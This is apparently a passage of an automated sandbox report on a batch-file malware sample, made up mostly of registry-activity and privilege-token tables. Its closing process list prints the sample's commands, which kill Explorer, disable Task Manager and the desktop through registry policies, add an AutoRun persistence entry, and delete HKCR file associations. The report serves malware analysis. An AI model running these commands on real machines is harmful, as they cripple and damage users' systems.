| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-557049126-2506969350-2798870634-1000\{EF11D5BB-4D5A-4136-AC20-6220C68B6EDF} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-557049126-2506969350-2798870634-1000\{DA8238FD-728D-4267-9BC7-7F6D29D4EE44} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-557049126-2506969350-2798870634-1000\{FF616862-825D-4B50-A32F-0E2997936EBE} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-557049126-2506969350-2798870634-1000\{4ECAEB51-E4B1-4B61-943B-4998728CF165} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-557049126-2506969350-2798870634-1000\{390BF571-BA7C-4A78-80C2-219879A69905} | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-557049126-2506969350-2798870634-1000\{FD834810-871D-4340-A66D-D8A4D4B1B0A8} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-557049126-2506969350-2798870634-1000\{C1945109-E5EA-47C6-9D63-C0100A85E031} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\cmd.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\cmd.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\FaZoN.bat"
C:\Windows\system32\msg.exe
msg * Gosha created by GGmex your computer infected
C:\Windows\system32\taskkill.exe
taskkill /f /im explorer.exe
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d C:\Windows\explorer.exe /f
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Polices\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\msg.exe
msg * Your desktop has been crashed
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\msg.exe
msg * Your windows infected by gosha :)
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\syste m32\gosha.bat" /f
C:\Windows\system32\msg.exe
msg * Deleted files
C:\Windows\system32\msg.exe
msg * Your system has been removed...
C:\Windows\system32\msg.exe
msg * Click OK
C:\Windows\system32\cmd.exe
cmd
C:\Windows\system32\reg.exe
reg delete HKCR/.exe
C:\Windows\system32\reg.exe
reg delete HKCR/.dll
C:\Windows\system32\reg.exe
reg delete HKCR/*
C:\Windows\system32\cmd.exe
cmd
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
